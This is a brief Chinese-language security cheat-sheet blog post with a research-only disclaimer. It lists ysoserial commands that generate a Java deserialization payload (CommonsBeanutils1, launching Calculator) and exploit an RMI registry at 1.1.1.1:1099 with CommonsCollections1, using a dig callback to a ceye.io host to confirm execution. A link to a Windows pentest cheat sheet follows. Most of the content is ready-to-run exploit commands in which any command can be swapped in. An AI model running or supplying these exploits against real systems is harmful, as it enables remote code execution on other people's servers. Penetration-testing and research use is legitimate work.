Security CheatSheet

Reading time ~1 minute

「声明:本博客中涉及到的相关漏洞均为官方已经公开并修复的漏洞,涉及到的安全技术也仅用于企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。」

Java 反序列化

ysoserial 生成 Payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'open /System/Applications/Calculator.app'

攻击 RMI

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 1.1.1.1 1099 CommonsCollections1 "dig test.xxxxx.ceye.io"

Windows渗透

https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html